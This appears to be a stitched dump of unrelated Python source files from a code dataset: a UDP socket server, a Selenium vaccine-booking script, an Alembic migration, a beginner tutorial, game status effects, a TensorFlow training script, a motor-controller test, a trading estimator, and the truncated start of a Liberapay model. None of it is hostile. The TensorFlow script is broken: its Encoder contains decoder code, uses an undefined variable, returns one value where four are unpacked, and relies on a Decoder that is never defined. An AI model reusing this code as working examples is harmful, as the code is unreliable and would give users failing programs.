\r\n\r\n\r\nlocalIP = \"127.0.0.1\"\r\n\r\nlocalPort = 20001\r\n\r\nbufferSize = 1024\r\n \r\n\r\n# Create a datagram socket\r\n\r\nUDPServerSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\r\n\r\n \r\n\r\n# Bind to address and ip\r\n\r\nUDPServerSocket.bind((localIP, localPort))\r\n\r\n \r\n\r\nprint(\"UDP server up and listening\")\r\n\r\n \r\n\r\n# Listen for incoming datagrams\r\n\r\nwhile(True):\r\n\r\n    bytesAddressPair = UDPServerSocket.recvfrom(bufferSize)\r\n\r\n    message = bytesAddressPair[0]\r\n\r\n    address = bytesAddressPair[1]\r\n\r\n\r\n\r\n    clientMsg = \"{}\".format(message)\r\n    #clientIP = \"Client IP Address:{}\".format(address)\r\n    \r\n    print(\"client: \"+ clientMsg[2:-1])\r\n    msg= input()\r\n\r\n    if(msg==\"BYE\"):\r\n        # close the server socket and stop listening (the original called\r\n        # close() on an undefined name 'sock', which raised a NameError)\r\n        UDPServerSocket.close()\r\n        break\r\n    else:\r\n        bytesToSend= str.encode(msg)\r\n        #encrypt(bytesToSend,4)\r\n        UDPServerSocket.sendto(bytesToSend, address)\r\n        # Sending a reply to client\r\n\r\n    ","repo_name":"normal-crayon/Py-sockets","sub_path":"server2.py","file_name":"server2.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8655047378","text":"import sys\nsys.path.append('..')\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport main as mainScript\n# XPATH DOSAGE\ndosage_amount_xpath = '//h1[@class=\"appointmentTypeSelectionstyles__TitleContainer-sc-clkvs7-3 cBbZEX\"]'\n\n# Stores the vaccination name and the web element\nvax_elem_dict = {}\n\n# Error handling method - TBC \ndef no_elem_found():\n    print(\"No vaccination elements were found on the page\")\n\n\n# Finding the elements using XPATH when they load on page\ndef find_vaccination_elements(driver, delay):\n    try:\n        vax_elements = WebDriverWait(driver, delay).until(\n            EC.visibility_of_all_elements_located((By.XPATH, dosage_amount_xpath)))\n    except NoSuchElementException:\n        no_elem_found()\n    else:\n        update_elem_dict(vax_elements)\n\n\n# Function that sets the vaccination name(key) and element scraped (value) based on vaccination name scraped\ndef update_elem_dict(elements):\n    for elem in elements:\n        vax_elem_dict[elem.text] = elem\n\n\n# Matches user selected vax with a vaccine on the page\ndef match_user_selected_vax():\n    user_in = \"Pfizer Dose 2\"\n    elem_key_list = [*vax_elem_dict]\n    selected_vax = \"\"\n\n    for key in elem_key_list:\n\n        if user_in in key:\n            selected_vax = key\n\n    return selected_vax\n\n# Matches the user selected vax element and clicks the element \ndef click_selected_vax():\n    selected_vaccine = match_user_selected_vax()\n\n    vax_elem_dict[selected_vaccine].click()\n\n# Main run-time -> Calls all other methods \ndef select_vaccine_script(driver):\n    delay = 10\n\n    find_vaccination_elements(driver, delay)\n\n    click_selected_vax()\n\n    # Fetch and click dynamically generated continue button\n    WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.TAG_NAME, \"button\"))).click()\n\n\n# Returns the amount of additional vaccination form fills required\ndef get_dose_number():\n\n    selected_vax = match_user_selected_vax()\n\n    if 'Dose 1' in selected_vax:\n        return 0\n    elif 'Dose 2' in selected_vax:\n        return 1\n    else:\n        return 2\n\n\n","repo_name":"Autovaxx/Backend","sub_path":"booking_script/shoppers/vaccination_select.py","file_name":"vaccination_select.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
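# [Editor's sketch, not a dataset record] The substring match performed by
# match_user_selected_vax() above reduces to this pattern (names illustrative):
vax_options = {'Pfizer Dose 2 (12+)': 'web-element'}
selected = next((k for k in vax_options if 'Pfizer Dose 2' in k), None)
assert selected == 'Pfizer Dose 2 (12+)'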
 +{"seq_id":"28218470619","text":"\"\"\"Add 'IRB_ONLINE_STATUS' column to IRBInfo table\n\nRevision ID: fcc193c49110\nRevises: d6627c76ed75\nCreate Date: 2022-04-07 16:00:36.260246\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fcc193c49110'\ndown_revision = 'd6627c76ed75'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    op.add_column('irb_info', sa.Column('IRB_ONLINE_STATUS', sa.String(), nullable=True))\n\n\ndef downgrade():\n    op.drop_column('irb_info', 'IRB_ONLINE_STATUS')\n","repo_name":"sartography/protocol-builder-mock","sub_path":"migrations/versions/fcc193c49110_add_irb_online_status_column_to_irbinfo_.py","file_name":"fcc193c49110_add_irb_online_status_column_to_irbinfo_.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"218144832","text":"# Functions - Lines of code to accomplish a task\n# Code MUST be indented, to be part of the function!\n# Named in lower case, 2 or more words = use underscore!\n\n#def = function\ndef say_hi():\n    print(\"Hello User\")\n\n\n# Execute the function = Calling the function\nprint(\"Top\")\nsay_hi()\nprint(\"Bottom\")\n\n# Parameter = information given to the function\n\ndef say_hi1(name):\n    print(\"Hello \" + name )\n\n\n# Execute the function = Calling the function\nsay_hi1(\"Ryan\")\nsay_hi1(\"Steve\")\nsay_hi1(\"Mike\")\n\ndef say_hi2(name, age):\n    print(\"Hello \" + name + \", you are \" + str(age))\n\nsay_hi2(\"Ryan\", \"34\")\nsay_hi2(\"Steve\", \"70\")\nsay_hi2(\"Mike\", \"60\")\n","repo_name":"ryanthemanr0x/Python","sub_path":"Giraffe/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
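# [Editor's sketch extending the Functions.py tutorial above; say_hi3 is
# illustrative and not part of the original file] Parameters can also take
# default values, making an argument optional:
def say_hi3(name, age=None):
    suffix = "" if age is None else ", you are " + str(age)
    print("Hello " + name + suffix)

say_hi3("Ryan")        # Hello Ryan
say_hi3("Steve", 70)   # Hello Steve, you are 70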
 +{"seq_id":"38624194927","text":"import base\n\nclass Burrow(base.Entity):\n\tdef __init__(self):\n\t\t# the original referenced the undefined name 'BurrowStatus' here,\n\t\t# which raised a NameError as soon as a Burrow was constructed\n\t\tsuper(Burrow,self).__init__()\n\n\tdef do_turn(self):\n\t\tpass\n\n\n# TODO- implement Stun(turns_to_be_stunned)\n\nclass Healing(base.Entity):\n\tdef __init__(self):\n\t\tsuper(Healing,self).__init__()\n\t\tself.turns = 5\n\n\tdef do_turn(self,options):\n\t\tif self.turns > 0:\n\t\t\thp_restored = self.owner.max_health * .10\n\t\t\tself.owner.health += hp_restored\n\t\t\tif self.owner.health > self.owner.max_health:\n\t\t\t\tself.owner.health = self.owner.max_health\n\t\t\tbase.put(\"[STATUS] healed %s for %d\" % (self.owner.name, hp_restored))\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\n\n\nclass Stun(base.Entity):\n\tdef __init__(self,turns):\n\t\tsuper(Stun,self).__init__()\n\t\tself.turns = turns\n\n\tdef do_turn(self,options):\n\t\tif self.turns > 0:\n\t\t\tbase.put('[STATUS] %s is stunned, and cannot move for another %d turns' % (self.owner.to_str(),self.turns))\n\t\t\tself.owner.action_points = 0\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\n\nclass Poison(base.Entity):\n\tdef __init__(self,turns,damage):\n\t\tsuper(Poison,self).__init__()\n\t\tself.turns = turns\n\t\tself.damage = damage\n\t\tself.name = 'poison'\n\n\tdef do_turn(self,option):\n\t\tif self.turns > 0:\n\t\t\tself.owner.health -= self.damage\n\t\t\tbase.put('[STATUS] %s takes %f poison damage' % (self.owner.name,self.damage))\n\t\t\tself.turns -= 1\n\t\t\tself.damage *= 1.2\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\n\tdef to_str(self):\n\t\treturn self.name\n\nclass Bleeding(base.Entity):\n\tdef __init__(self,turns,damage):\n\t\tsuper(Bleeding,self).__init__()\n\t\tself.turns = turns\n\t\tself.damage = damage\n\t\tself.name = 'bleeding'\n\n\tdef do_turn(self,option):\n\t\tif self.turns > 0:\n\t\t\tself.owner.health -= self.damage\n\t\t\tbase.put('[STATUS] %s takes %f bleed damage' % (self.owner.name,self.damage))\n\t\t\t# halve AFTER logging, so the message reports the damage actually dealt\n\t\t\tself.damage /= 2\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\n\tdef to_str(self):\n\t\treturn self.name\n\nclass Maim(base.Entity):\n\tdef __init__(self,turns,amount):\n\t\tsuper(Maim,self).__init__()\n\t\tself.turns = turns\n\t\tself.amount = amount\n\t\tself.name = 'maim'\n\n\tdef do_turn(self,option):\n\t\tif self.turns > 0:\n\t\t\tself.owner.action_points -= self.amount\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\n\tdef to_str(self):\n\t\treturn self.name\n\nclass Sleep(base.Entity):\n\tdef __init__(self):\n\t\tsuper(Sleep,self).__init__()\n\n\tdef do_turn(self,options):\n\n\t\tchance = base.D20.roll()\n\t\tif chance > 16:\n\t\t\tself.owner.statuses.remove(self)\n\t\t\tbase.put('[STATUS] %s has awoken!' % (self.owner.to_str()))\n\t\telse:\n\t\t\tbase.put('[STATUS] %s is asleep, and cannot move!' % (self.owner.to_str()))\n\t\t\tself.owner.action_points = 0\n\n\nclass Blind(base.Entity):\n\tdef __init__(self,turns):\n\t\tsuper(Blind,self).__init__()\n\t\tself.turns = turns\n\n\tdef do_turn(self,options):\n\t\tif self.turns > 0:\n\t\t\t# only report the miss while the status is still active\n\t\t\tbase.put('[STATUS] %s is blinded, and will not hit!' % self.owner.to_str())\n\t\t\tself.owner.action_points = 0\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\nclass Burn(base.Entity):\n\tdef __init__(self,turns,damage):\n\t\tsuper(Burn,self).__init__()\n\t\tself.turns = turns\n\t\tself.damage = damage\n\t\tself.name = 'burn'\n\n\tdef do_turn(self,option):\n\t\tif self.turns > 0:\n\t\t\tself.owner.health -= self.damage\n\t\t\tbase.put('[STATUS] %s takes %f burn damage' % (self.owner.name,self.damage))\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\n\tdef to_str(self):\n\t\treturn self.name\n\nclass Cooldown(base.Entity):\n\tdef __init__(self,spell,turns):\n\t\tsuper(Cooldown,self).__init__()\n\t\tself.spell = spell\n\t\tself.turns = turns\n\t\tself.spell.on_cooldown = True\n\n\tdef do_turn(self,option):\n\t\tif self.turns > 0:\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.spell.on_cooldown = False\n\t\t\tself.owner.statuses.remove(self)\n","repo_name":"johndikeman/dunces-and-dungeons","sub_path":"entity/status/player_statuses.py","file_name":"player_statuses.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"14336243991","text":"import BasicFunction as bf\r\nimport Blocks as bs\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nimport numpy as np\r\nimport re\r\nimport math\r\n\r\n\r\n\r\ndef Encoder(inputTensor,outputChannels,blockName):\r\n    with tf.variable_scope(blockName):\r\n        conv1x1_1 = 
bs.SmallUniteConvolutionBlock(inputTensor,kernalSize=1,\r\n outChannels=128,gNum=4,blockName=\"Conv1x1_Decoder_First_Step\")\r\n conv1x1_2 = bs.SmallUniteConvolutionBlock(conv1x1_1,kernalSize=1,\r\n outChannels=64,gNum=4,blockName=\"Conv1x1_Decoder_Second_Step\")\r\n globalPooling = keras.layers.GlobalAvgPool2D(data_format=\"channels_first\",name=\"AVG_Global_Decoder\")(conv1x1_2)\r\n weight1 = bf.WeightCreation(shape=[64,128],name=\"TransWeight1\")\r\n bias1 = tf.constant(value=0.,dtype=tf.float32,shape=[128],name=\"Bias1\")\r\n layer1 = keras.layers.PReLU(trainable=True)(tf.add(tf.matmul(globalPooling,weight1),bias1))\r\n weight2 = bf.WeightCreation(shape=[128,outputSize],name=\"TransWeight2\")\r\n bias2 = tf.constant(value=0.,dtype=tf.float32,shape=[outputSize],name=\"Bias2\")\r\n outputTensor = tf.add(tf.matmul(layer1,weight2),bias2)\r\n return outputTensor\r\n\r\ndef generateData(MapG):\r\n while True :\r\n for k in MapG:\r\n yield MapG[k]\r\n\r\ndef Min_Max_Nor(nums):\r\n minNum = np.min(nums)\r\n maxNum = np.max(nums)\r\n distence = maxNum - minNum + 0.0\r\n return (nums - minNum) / distence + 0.0001\r\n\r\nif __name__ == \"__main__\":\r\n np.set_printoptions(suppress=True)\r\n ### Config parameters\r\n batchSize = 6\r\n resultSize = 2\r\n featureChannels = 1\r\n epoch = 10\r\n timesInOneEpoch = 3500\r\n lr = 0.001\r\n displayTimes = 30\r\n decayStep = 1700\r\n decayRate = 0.96\r\n dataTrainFilePath = \"d:\\\\CandidateThresholdTrain.txt\"\r\n dataTestFilePath = \"d:\\\\CandidateThresholdTest.txt\"\r\n modelTrainOrTest = \"test\"\r\n saveModelSteps = 3498\r\n saveModelPath = \"d:\\\\featureExtractSavePath\\\\\"\r\n saveResultPath = \"d:\\\\featureResult.txt\"\r\n ### Net construction\r\n inputDataPlaceHolder = tf.placeholder(dtype=tf.float32,shape=[None,1,4,4])\r\n labelDataPlaceHolder = tf.placeholder(dtype=tf.float32,shape=[None,resultSize])\r\n lrPlaceHolder = tf.placeholder(dtype=tf.float32)\r\n conv1,trans , conv3 , featureTensor = Encoder(inputDataPlaceHolder,outputChannels=featureChannels,blockName=\"EncoderNet\")\r\n predictTensor = Decoder(featureTensor,outputSize=resultSize,blockName=\"DecoderNet\")\r\n different = tf.nn.softmax_cross_entropy_with_logits_v2(labels=labelDataPlaceHolder,logits=predictTensor,dim=1,name=\"CrossDis\")\r\n labelLoss = tf.reduce_mean(different,name=\"ReduceMean\")\r\n tf.add_to_collection(\"Loss\",labelLoss)\r\n tLoss = tf.add_n(tf.get_collection(\"Loss\"))\r\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\r\n optim = tf.train.MomentumOptimizer(learning_rate=lrPlaceHolder,momentum=0.9,use_nesterov=True).minimize(tLoss)\r\n tf.summary.FileWriter(logdir=saveModelPath, graph=tf.get_default_graph())\r\n print(\"Complete Net Build .\")\r\n ### Training data\r\n with tf.Session() as sess :\r\n if modelTrainOrTest.lower() == \"train\":\r\n sess.run(tf.global_variables_initializer())\r\n sess.run(tf.local_variables_initializer())\r\n print(\"Initial has completed .\")\r\n trainingNum = 0\r\n ### Read and use Min-Max score to Normalization data\r\n dataPInputMap = {}\r\n dataPLabelMap = {}\r\n dataNInputMap = {}\r\n dataNLabelMap = {}\r\n dataID2Arg = {}\r\n with open(file=dataTrainFilePath, mode=\"r\") as f:\r\n for i, line in enumerate(f):\r\n if i != 0:\r\n inputData = re.split(pattern=\"\\t\", string=line)\r\n label = int(inputData[4])\r\n idStr = inputData[:4]\r\n dataID2Arg[i] = idStr\r\n if label == 1:\r\n top2 = np.array(inputData[5:7], dtype=np.float32) * 1000.\r\n final = np.array(inputData[7:], dtype=np.float32)\r\n m 
= np.array(list(top2) + list(final), dtype=np.float32)\r\n m = Min_Max_Nor(m)\r\n m = [0.] + list(m) + [0.]\r\n m = np.array(m, dtype=np.float32)\r\n m = np.reshape(m, newshape=[1, 4, 4])\r\n dataPInputMap[i] = m\r\n dataPLabelMap[i] = np.array([0, 1], dtype=np.float32)\r\n if label == 0:\r\n top2 = np.array(inputData[5:7], dtype=np.float32) * 1000.\r\n final = np.array(inputData[7:], dtype=np.float32)\r\n m = np.array(list(top2) + list(final), dtype=np.float32)\r\n m = Min_Max_Nor(m)\r\n m = [0.] + list(m) + [0.]\r\n m = np.array(m, dtype=np.float32)\r\n m = np.reshape(m, newshape=[1, 4, 4])\r\n dataNInputMap[i] = m\r\n dataNLabelMap[i] = np.array([1, 0], dtype=np.float32)\r\n print(\"Read data has completed .\")\r\n dataPYield = generateData(dataPInputMap)\r\n labelPYield = generateData(dataPLabelMap)\r\n dataNYield = generateData(dataNInputMap)\r\n labelNYield = generateData(dataNLabelMap)\r\n for _ in range(epoch):\r\n for _ in range(timesInOneEpoch):\r\n dataInputs = []\r\n dataLabels = []\r\n for b in range(batchSize // 2):\r\n dataPInput = dataPYield.__next__()\r\n dataPLabel = labelPYield.__next__()\r\n dataNInput = dataNYield.__next__()\r\n dataNLabel = labelNYield.__next__()\r\n dataInputs.append(dataPInput)\r\n dataInputs.append(dataNInput)\r\n dataLabels.append(dataPLabel)\r\n dataLabels.append(dataNLabel)\r\n dataInputs = np.array(dataInputs)\r\n dataLabels = np.array(dataLabels)\r\n # print(\"Inputs \",dataInputs)\r\n # print(\"Labels \",dataLabels)\r\n if trainingNum % displayTimes == 0:\r\n tLossNum = sess.run(tLoss, feed_dict={\r\n inputDataPlaceHolder: dataInputs,\r\n labelDataPlaceHolder: dataLabels,\r\n lrPlaceHolder: lr\r\n })\r\n predictTensorNum = sess.run(predictTensor, feed_dict={\r\n inputDataPlaceHolder: dataInputs\r\n })\r\n featureTensorNum = sess.run(featureTensor, feed_dict={\r\n inputDataPlaceHolder: dataInputs\r\n })\r\n conv3Num = sess.run(conv3, feed_dict={\r\n inputDataPlaceHolder: dataInputs\r\n })\r\n transNum = sess.run(trans, feed_dict={\r\n inputDataPlaceHolder: dataInputs\r\n })\r\n labelLossNum = sess.run(labelLoss, feed_dict={\r\n inputDataPlaceHolder: dataInputs,\r\n labelDataPlaceHolder: dataLabels\r\n })\r\n print(\"trans is \", transNum)\r\n print(\"conv3 is \", conv3Num)\r\n print(\"Feature tensor is \", featureTensorNum)\r\n print(\"It has trained \" + str(trainingNum) + \" times .\")\r\n print(\"Learning rate is \", lr)\r\n print(\"Total losses are \", tLossNum)\r\n print(\"Label loss is \", labelLossNum)\r\n print(\"Predict labels are \", predictTensorNum)\r\n print(\"True Labels are \", dataLabels)\r\n sess.run(optim, feed_dict={\r\n inputDataPlaceHolder: dataInputs,\r\n labelDataPlaceHolder: dataLabels,\r\n lrPlaceHolder: lr\r\n })\r\n trainingNum = trainingNum + 1\r\n if trainingNum % decayStep == 0 and trainingNum != 0:\r\n lr = lr * math.pow(decayRate, trainingNum / decayStep + 0.0)\r\n if trainingNum % saveModelSteps == 0 and trainingNum != 0:\r\n tf.train.Saver().save(sess=sess, save_path=saveModelPath + \"model.ckpt\")\r\n tf.summary.FileWriter(logdir=saveModelPath, graph=tf.get_default_graph(),\r\n session=sess)\r\n else:\r\n tf.train.Saver().restore(sess=sess,\r\n save_path=saveModelPath + \"model.ckpt\")\r\n print(\"Initial has completed .\")\r\n ### Read and use Min-Max score to Normalization data\r\n dataPInputMap = {}\r\n dataPLabelMap = {}\r\n dataNInputMap = {}\r\n dataNLabelMap = {}\r\n dataID2Arg = {}\r\n with open(file=dataTestFilePath, mode=\"r\") as f:\r\n for i, line in enumerate(f):\r\n if i != 0:\r\n inputData = 
re.split(pattern=\"\\t\", string=line)\r\n label = int(inputData[4])\r\n idStr = inputData[:4]\r\n dataID2Arg[i] = idStr\r\n if label == 1:\r\n top2 = np.array(inputData[5:7], dtype=np.float32) * 1000.\r\n final = np.array(inputData[7:], dtype=np.float32)\r\n m = np.array(list(top2) + list(final), dtype=np.float32)\r\n m = Min_Max_Nor(m)\r\n m = [0.] + list(m) + [0.]\r\n m = np.array(m, dtype=np.float32)\r\n m = np.reshape(m, newshape=[1, 4, 4])\r\n dataPInputMap[i] = m\r\n dataPLabelMap[i] = np.array([0, 1], dtype=np.float32)\r\n if label == 0:\r\n top2 = np.array(inputData[5:7], dtype=np.float32) * 1000.\r\n final = np.array(inputData[7:], dtype=np.float32)\r\n m = np.array(list(top2) + list(final), dtype=np.float32)\r\n m = Min_Max_Nor(m)\r\n m = [0.] + list(m) + [0.]\r\n m = np.array(m, dtype=np.float32)\r\n m = np.reshape(m, newshape=[1, 4, 4])\r\n dataNInputMap[i] = m\r\n dataNLabelMap[i] = np.array([1, 0], dtype=np.float32)\r\n print(\"Read data has completed .\")\r\n totSamples = 0\r\n TP = 0\r\n TN = 0\r\n FP = 0\r\n FN = 0\r\n with open(saveResultPath,mode=\"w\") as w :\r\n for kv in dataPInputMap:\r\n testInput = np.reshape(dataPInputMap[kv], newshape=[1, 1, 4, 4])\r\n testLabel = dataPLabelMap[kv]\r\n featureTestNum = sess.run(featureTensor, feed_dict={\r\n inputDataPlaceHolder: testInput\r\n })\r\n predictTestNum = sess.run(predictTensor, feed_dict={\r\n inputDataPlaceHolder: testInput\r\n })\r\n totSamples = totSamples + 1\r\n IDString = dataID2Arg[kv]\r\n featureFlatten = np.reshape(np.array(featureTestNum,dtype=np.float32), newshape=[4])\r\n if np.argmax(predictTestNum) == np.argmax(testLabel):\r\n w.write(str(IDString) + \" TRUE \" + \" 1 \" + str(featureFlatten) + \"\\n\")\r\n TP = TP + 1\r\n print(kv)\r\n else:\r\n w.write(str(IDString) + \" FALSE \" + \" 1 \" + str(featureFlatten) + \"\\n\")\r\n FN = FN + 1\r\n print(kv)\r\n\r\n for kv in dataNInputMap:\r\n testInput = np.reshape(dataNInputMap[kv], newshape=[1, 1, 4, 4])\r\n testLabel = dataNLabelMap[kv]\r\n featureTestNum = sess.run(featureTensor, feed_dict={\r\n inputDataPlaceHolder: testInput\r\n })\r\n predictTestNum = sess.run(predictTensor, feed_dict={\r\n inputDataPlaceHolder: testInput\r\n })\r\n totSamples = totSamples + 1\r\n IDString = dataID2Arg[kv]\r\n featureFlatten = np.reshape(np.array(featureTestNum,dtype=np.float32), newshape=[4])\r\n if np.argmax(predictTestNum) == np.argmax(testLabel):\r\n w.write(str(IDString) + \" TRUE \" + \" 0 \" + str(featureFlatten) + \"\\n\")\r\n print(kv)\r\n TN = TN + 1\r\n else:\r\n w.write(str(IDString) + \" FALSE \" + \" 0 \" + str(featureFlatten) + \"\\n\")\r\n print(kv)\r\n FP = FP + 1\r\n print(\"Acc ratio is \",(TP + TN) / totSamples + 0.)\r\n print(\"Sensitive ratio is \", TP / (TP + FN) + 0.)\r\n print(\"Specificity ratio is \",TN / (TN + FP) + 0.)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"zoubohao/Use-Diversity-Convolution-Blocks-To-Simulate-Transformer-Feature-Extraction","sub_path":"FeatureExtract.py","file_name":"FeatureExtract.py","file_ext":"py","file_size_in_byte":14659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33207083634","text":"import os\nimport time\nfrom datetime import datetime\nfrom roboclaw_zwv import Roboclaw_zwv\n\nserial_port = \"/dev/ttyACM0\"\nbaud_rate = 38400\naddress = 0x80\nlog_file_dir = \"../../Logs\"\n \ntry:\n roboclaw = Roboclaw_zwv(serial_port, baud_rate)\n if not roboclaw.Open():\n raise Exception(f\"Unable to open port {serial_port}\")\n \n 
roboclaw.execute_buffered_commands_with_logging(address,\n [\n lambda : roboclaw.SpeedDistanceM1(address, 200, 1400, 0),\n lambda : roboclaw.SpeedDistanceM1(address, 100, 50, 0)\n ],\n 2,\n 2\n )\n roboclaw.graph_metrics(roboclaw.log_file.name)\n \nfinally:\n if roboclaw._port.is_open:\n roboclaw._port.close()\n\n\n","repo_name":"7Gaming/ZeroWasteVending","sub_path":"test_roboclaw.py","file_name":"test_roboclaw.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6574528865","text":"import pandas as pd\nimport tqdm\n\nfrom melo_fwk.basket.strat_basket import StratBasket\nfrom melo_fwk.estimators.base_estimator import MeloBaseEstimator\nfrom melo_fwk.pose_size.vol_target import VolTarget\nfrom melo_fwk.trading_systems import TradingSystemIter\nfrom melo_fwk.market_data.product import Product\n\nclass VolTargetEstimator(MeloBaseEstimator):\n\t\"\"\"\n\tVolTargetEstimator class is a subclass of the MeloBaseEstimator class. It is used to optimize the\n\tvolatility target for a trading system.\n\t\"\"\"\n\n\tdef __init__(self, **kwargs):\n\t\t\"\"\"\n\t\tConstructor for the VolTargetEstimator class. Calls the constructor of the parent class MeloBaseEstimator\n\t\tand initializes the logger.\n\t\tIt also initializes the following instance variables:\n\t\t\ttrading_capital: The trading capital for the trading system.\n\t\t\tstep: The step size for incrementing the volatility target.\n\t\t\tstart: The starting value for the volatility target.\n\t\t\tfinal: The final value for the volatility target.\n\t\t\"\"\"\n\t\tsuper(VolTargetEstimator, self).__init__(**kwargs)\n\t\tself.trading_capital = self.estimator_params_dict.get(\n\t\t\t\"trading_capital\", self.size_policy.vol_target.trading_capital)\n\t\tself.step = self.estimator_params_dict.get(\"step\", 0.1)\n\t\tself.start = self.estimator_params_dict.get(\"start\", 0.1)\n\t\tself.final = self.estimator_params_dict.get(\"final\", 1.)\n\t\tself.logger.info(\"Initialized Estimator\")\n\n\tdef run(self):\n\t\t\"\"\"\n\t\tRuns the volatility target optimization for all products in the products dictionary of the VolTargetEstimator instance.\n\t\tReturns a dictionary of data frames containing the optimization results for each product.\n\t\t\"\"\"\n\t\toutput_dict = dict()\n\t\tself.logger.info(f\"Running Estimatior on {len(self.products)} Products\")\n\t\tfor i, (product_name, product_dataclass) in tqdm.tqdm(enumerate(self.products.items()), leave=False):\n\t\t\toutput_dict[product_name] = self._trade_product(product_dataclass)\n\t\tself.logger.info(\"Finished running estimator\")\n\n\t\treturn output_dict\n\n\tdef _trade_product(self, product: Product):\n\t\t\"\"\"\n\t\tOptimizes the volatility target for a given product.\n\t\tReturns a data frame containing the optimization results.\n\t\t\"\"\"\n\t\tsize_policy = self.size_policy\n\t\tsize_policy.vol_target = VolTarget(\n\t\t\tannual_vol_target=self.start,\n\t\t\ttrading_capital=self.trading_capital\n\t\t)\n\t\tresults = list()\n\n\t\tn_iter = int((self.final - self.start) / self.step)\n\t\tfor _ in tqdm.tqdm(range(n_iter), leave=False):\n\t\t\tts = TradingSystemIter(\n\t\t\t\tstrat_basket=StratBasket(\n\t\t\t\t\tstrat_list=self.strategies,\n\t\t\t\t\tweights=self.forecast_weights,\n\t\t\t\t),\n\t\t\t\tsize_policy=size_policy,\n\t\t\t)\n\t\t\ttsar = ts.run_product(product)\n\n\t\t\tresults.append({\n\t\t\t\t\"vol_target\": size_policy.vol_target.annual_vol_target,\n\t\t\t\t\"gar\": tsar.gar(), # get 
geometric returns\n\t\t\t})\n\t\t\tsize_policy.update_annual_vol_target(self.step)\n\n\t\treturn pd.DataFrame(results)\n","repo_name":"omarboukhris/melo-fwk","sub_path":"melo_fwk/estimators/vol_target_estimator.py","file_name":"vol_target_estimator.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17076474432","text":"from __future__ import print_function, unicode_literals\n\nfrom base64 import b64decode, b64encode\nfrom decimal import Decimal, ROUND_DOWN\nfrom email.utils import formataddr\nfrom hashlib import pbkdf2_hmac, md5\nfrom os import urandom\nimport pickle\nfrom time import sleep\nimport uuid\n\nfrom six.moves.urllib.parse import urlencode\n\nfrom aspen.utils import utcnow\nimport aspen_jinja2_renderer\nfrom markupsafe import escape as htmlescape\nfrom postgres.orm import Model\nfrom psycopg2 import IntegrityError\nfrom psycopg2.extras import Json\n\nfrom liberapay.billing import mangoapi\nfrom liberapay.constants import (\n ASCII_ALLOWED_IN_USERNAME, AVATAR_QUERY, EMAIL_RE,\n EMAIL_VERIFICATION_TIMEOUT, MAX_TIP,\n MIN_TIP, PASSWORD_MAX_SIZE, PASSWORD_MIN_SIZE, SESSION, SESSION_REFRESH,\n SESSION_TIMEOUT, USERNAME_MAX_SIZE\n)\nfrom liberapay.exceptions import (\n BadAmount,\n BadEmailAddress,\n BadPasswordSize,\n CannotRemovePrimaryEmail,\n EmailAlreadyTaken,\n EmailNotVerified,\n NonexistingElsewhere,\n NoSelfTipping,\n NoTippee,\n TooManyEmailAddresses,\n UserDoesntAcceptTips,\n UsernameAlreadyTaken,\n UsernameContainsInvalidCharacters,\n UsernameIsEmpty,\n UsernameIsRestricted,\n UsernameTooLong,\n)\nfrom liberapay.models._mixin_team import MixinTeam\nfrom liberapay.models.account_elsewhere import AccountElsewhere\nfrom liberapay.models.community import Community\nfrom liberapay.models.exchange_route import ExchangeRoute\nfrom liberapay.notifications import EVENTS\nfrom liberapay.security.crypto import constant_time_compare\nfrom liberapay.utils import (\n b64encode_s, erase_cookie, serialize, set_cookie,\n emails, i18n,\n)\nfrom liberapay.website import website\n\n\nclass Participant(Model, MixinTeam):\n\n typname = 'participants'\n\n ANON = False\n\n def __eq__(self, other):\n if not isinstance(other, Participant):\n return False\n return self.id == other.id\n\n def __ne__(self, other):\n if not isinstance(other, Participant):\n return True\n return self.id != other.id\n\n def __repr__(self):\n return '' % (repr(self.id), repr(self.username))\n\n\n # Constructors\n # ============\n\n @classmethod\n def make_stub(cls, cursor=None, **kw):\n \"\"\"Return a new stub participant.\n \"\"\"\n if kw:\n cols, vals = zip(*kw.items())\n cols = ', '.join(cols)\n placeholders = ', '.join(['%s']*len(vals))\n x = '({0}) VALUES ({1})'.format(cols, placeholders)\n else:\n x, vals = 'DEFAULT VALUES', ()\n with cls.db.get_cursor(cursor) as c:\n return c.one(\"\"\"\n INSERT INTO participants {0}\n RETURNING 